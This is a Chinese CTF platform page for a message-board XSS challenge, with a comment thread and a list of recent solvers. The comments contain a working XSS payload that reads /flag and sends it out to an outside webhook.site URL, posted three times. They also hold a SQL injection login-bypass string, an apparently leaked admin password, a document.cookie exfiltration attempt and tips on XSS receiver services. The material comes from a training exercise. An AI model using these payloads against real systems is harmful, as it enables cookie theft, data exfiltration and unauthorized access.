留言板WEB 未解决

分数: 10 金币: 3
题目作者: harry
一  血: ꧁༺༽༾ཊ彪ཏ༿༼༻꧂
一血奖励: 5金币
解  决: 3402
提  示: 题目无需登录后台!需要xss平台接收flag
描  述:
http协议需要http协议的xss平台
...
登录回复
评论
song..22 25天前
举报

<img src=x onerror="fetch('/flag').then(r=>r.text()).then(d=>fetch('http://webhook.site/59ef6d33-3e0e-4a78-82f8-f38d98eff154?flag='+encodeURIComponent(d)))">

回复 0
song..22 25天前
举报

<img src=x onerror="fetch('/flag').then(r=>r.text()).then(d=>fetch('http://webhook.site/59ef6d33-3e0e-4a78-82f8-f38d98eff154?flag='+encodeURIComponent(d)))">

回复 1
song..22 25天前
举报

<img src=x onerror="fetch('/flag').then(r=>r.text()).then(d=>fetch('http://webhook.site/59ef6d33-3e0e-4a78-82f8-f38d98eff154?flag='+encodeURIComponent(d)))">

回复 0
Gcysnd 1月前
举报

挺容易,挖到admin后台/admin.php用1' or '1' = '1' --万能用户名登录后发现存在html注入点,于是聊天室发送<script>alert(cookie)</scirpt>找到flag

回复 0
xxsko 1月前
举报

万能用户名你可以?我用你这个也不行1' or '1' = '1' --万能用户名

回复 0
2333m 1月前
举报

触发xss需要登录后台/admin.php, admin/011be4d65feac1a8 (通过翻评论区找到的,据说是dirsearch跑出来admin.php和db.sql,但是我没找到)

回复 0
YS_JW 2月前
举报

我在img图片位置直接插入http://{ceye平台}/?cookie='+document.cookie+',ceye那边有回显,但是cookie没有被带出来,直接以?cookie=\%27+document.cookie+\%27形式返回了,去掉'后也是直接以document.cookie字符返回,这是为啥哦,问ai也没问出来原因

回复 0
BLX123 5月前
举报

想用python的h(ttp)协议来接收xss,自身得是一个公网IP反弹才能定位到自己

回复 0
网恋秀牛子被录屏导致自卑 5月前
举报

ceye,xsspt,xss.aq要么收不到要么收费,我用的是xss.report,可以收到,payload很多,界面酷炫,点右边的爬虫图标就能看到详情,cookie里面有flag

回复 1
igrazee 6月前
举报

flag{*******}

回复 0
TTxyz 8月前
举报

啥题啊?不登陆怎么回显的???还有那个db.sql扫不出来啊,我直接访问也是无法连接???

回复 0

WriteUp

image
丶我亚索贼六

5 金币

立即查看

评分(19)

解题动态

heting 攻破了该题 1天前
店晓贰 攻破了该题 3天前
pkouki 攻破了该题 4天前
wjzkifaa 攻破了该题 4天前
nanhe6 攻破了该题 6天前
asdliuyan 攻破了该题 8天前
susanzht 攻破了该题 8天前
dacming9527 攻破了该题 10天前
船长 攻破了该题 12天前
ggtom 攻破了该题 12天前
Xiig 攻破了该题 13天前
SE_Stars 攻破了该题 13天前
lanhou 攻破了该题 14天前
掘金 攻破了该题 15天前
gehewu 攻破了该题 18天前
CTF-大王 攻破了该题 19天前
pigpigG6768 攻破了该题 21天前
ccxxxc 攻破了该题 21天前
panzhang 攻破了该题 22天前
gdrhdr 攻破了该题 22天前
问题反馈